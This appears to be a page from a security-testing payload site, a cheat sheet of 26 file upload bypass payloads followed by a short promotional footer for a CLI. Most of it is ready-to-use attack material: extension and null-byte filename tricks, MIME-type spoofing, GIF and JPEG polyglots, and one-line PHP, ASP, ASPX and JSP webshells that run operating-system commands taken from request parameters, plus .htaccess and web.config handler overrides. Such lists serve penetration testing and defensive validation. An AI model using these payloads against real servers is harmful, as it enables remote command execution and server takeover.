$loading...
File upload bypass payloads for extension filtering, MIME type checks, content validation, and webshell deployment. (26 payloads)
shell.php.jpgshell.php%00.jpgshell.pHpshell.php5shell.phtmlshell.php.bakshell.php::$DATAshell.php%0ashell.php.shell.php shell.shtmlshell.php;.jpgContent-Type: image/jpeg (with PHP content)Content-Type: image/png (with PHP content)Content-Type: image/gif (with GIF89a; header + PHP)GIF89a;<?php system($_GET["cmd"]); ?><?php system($_GET["cmd"]); ?><?php echo shell_exec($_GET["cmd"]); ?><?=`$_GET[0]`?><% eval request("cmd") %><%@ Page Language="C#"%><%System.Diagnostics.Process.Start("cmd.exe","/c "+Request["c"]);%><%Runtime.getRuntime().exec(request.getParameter("cmd"));%>Embed PHP in EXIF data of real JPEGPolyglot file: valid JPEG + PHP code in comment.htaccess: AddType application/x-httpd-php .jpgweb.config with PHP handler mappingLevel up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides